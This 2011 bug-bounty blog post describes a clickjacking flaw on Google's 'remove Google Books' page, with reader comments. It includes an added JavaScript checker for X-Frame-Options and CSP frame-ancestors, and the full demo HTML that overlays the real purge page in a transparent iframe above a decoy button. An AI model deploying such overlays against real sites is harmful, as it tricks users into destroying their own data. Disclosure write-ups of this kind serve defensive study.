Tuesday, 13 September 2011

Remove Google Books with Clickjacking

Google Accounts has options to remove individual Google products from an account. One of them was to remove Google Books permanently.


This action was well protected against CSRF with anti-CSRF tokens. However, the page could still be rendered inside an iframe on a third-party site, because it had no clickjacking protection: neither frame-busting code nor an X-Frame-Options header.


To carry out a successful clickjacking attack, the attacker loads the vulnerable page in a transparent iframe and places a visible decoy button directly underneath the spot where the page's "OK" button is rendered, so that a click on the decoy actually lands on "OK".


The page presented to the victim looks like this.



When an authenticated user browses to the above page hosted on the attacker's site, the invisible iframe loads the remove-Google-Books page with the proper anti-CSRF token already in place, because the browser sends the victim's Google session cookies with the framed request. When the user clicks the "Click" button, he or she actually clicks the "OK" button on the vulnerable page, and all of that user's reviews, ratings and libraries are deleted.

This attack needs only one click and has the same effect as a CSRF attack: a state-changing request is sent with the victim's credentials, and the anti-CSRF token does not help, since the request is submitted by the genuine form inside the frame.
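To make the missing defence concrete, here is an added example (not code from the original post or from Google) that checks whether a response may be framed by a page at a given origin, using the two headers browsers consult for this: X-Frame-Options and the newer Content-Security-Policy frame-ancestors directive. The sample header sets, the page origin and the attacker origin are constructed for the example; the first sample mirrors the situation described above, where the response carries no framing protection at all.

```javascript
'use strict';

// Added example, not the original post's code. Decides whether a response can
// be rendered in an <iframe> by a document at `embedderOrigin`, given the
// response headers and the origin of the framed page. Port handling is
// simplified to exact or default-port matches; everything else follows browser
// behaviour: CSP frame-ancestors, when present, wins over X-Frame-Options.

const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Normalise header names to lower case so lookups are case-insensitive.
function lowerKeys(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Return the source list of a frame-ancestors directive, or null if the CSP
// value is absent or carries no such directive.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null;
}

// Does one frame-ancestors source expression match the embedding origin?
function sourceMatches(src, embedderOrigin, pageOrigin) {
  const s = src.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return embedderOrigin === pageOrigin;
  const emb = new URL(embedderOrigin);
  // Scheme source such as "https:" matches any host using that scheme.
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return emb.protocol === s;
  // Host source: [scheme://][*.]host[:port|*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/.exec(s);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme && scheme + ':' !== emb.protocol) return false;
  const embPort = emb.port || DEFAULT_PORT[emb.protocol] || '';
  if (port && port !== '*' && port !== embPort) return false;
  if (wild) return emb.hostname.endsWith('.' + host);
  return emb.hostname === host;
}

// true  -> the page is frameable from embedderOrigin (clickjackable if it has
//          click-driven state changes, as the Google Books purge page did)
// false -> the browser refuses to render it in that frame
function canBeFramed(headers, embedderOrigin, pageOrigin) {
  const h = lowerKeys(headers);
  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors) {
    return ancestors.some((src) => sourceMatches(src, embedderOrigin, pageOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === pageOrigin;
  // No header, or an unrecognised value (including the never-standardised
  // ALLOW-FROM, which current browsers ignore): the page is frameable by anyone.
  return true;
}

// Constructed header sets for the check (not captured from any real server).
const SAMPLES = {
  unprotected: { 'Content-Type': 'text/html; charset=utf-8' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'X-Frame-Options': 'SAMEORIGIN' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
  cspPartner: { 'Content-Security-Policy': 'frame-ancestors https://*.partner.example' },
  cspOverridesXfo: {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'self'",
  },
};

const PAGE = 'https://www.google.com';        // origin of the framed page
const ATTACKER = 'https://attacker.example';   // hypothetical attacker origin

// Evaluate every sample from the attacker's origin and return the verdicts.
function report() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) {
    out[name] = canBeFramed(headers, ATTACKER, PAGE);
  }
  return out;
}

console.log(report());
```

Only the `unprotected` sample comes back frameable from the attacker's origin, which is exactly the state the purge page was in. A practitioner testing for this today should look at both headers, since a site that sets X-Frame-Options: DENY but then adds a permissive frame-ancestors directive has reopened the hole.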

Edit: Here is the demo code used for this exploit:

<html>
<head>
<style>
/* Decoy button the victim sees. z-index:-10 keeps it underneath the frame,
   so the click is received by the framed Google page, not by this button. */
button.dummy{position:absolute;top:8px;left:18px;z-index:-10}

/* Container for the framed page: fully transparent (opacity: 0) and shifted
   up and left so the real "OK" button lies exactly over the decoy. */
#victim {
opacity: 0;
position: absolute;
top: -640px;
left: -55px;
overflow: hidden;
width:800px;
height: 700px;
}
</style>
</head>
<body>
<button type="button" class="dummy">Click</button>
<div id="victim">
<!-- The remove-Google-Books page loads with the victim's session cookies,
     so the form's own anti-CSRF token is already present. -->
<iframe src="http://www.google.com/books?op=purge&amp;continue=http://www.google.com/accounts/EditServices" frameborder="0" scrolling="no" width="350" height="900"></iframe>
</div>
</body>
</html>


I would like to thank Google for choosing this bug for a reward.

7 comments:

  1. Nice practical example of clickjacking. Awesome work.

  2. OK. This is a neat demo for a Cross Frame Scripting attack (XFS). Can you post the demo code that you used to overlay the button?

  3. Thanks @webDEViL

    @p0wnsauc3: The post has been updated with the demo code.

  4. Nice again :) I need to start looking for Google clickjackings myself as you're getting all the money ;)

  5. Nice Finding Amol...

    So what is the total reward sum now?
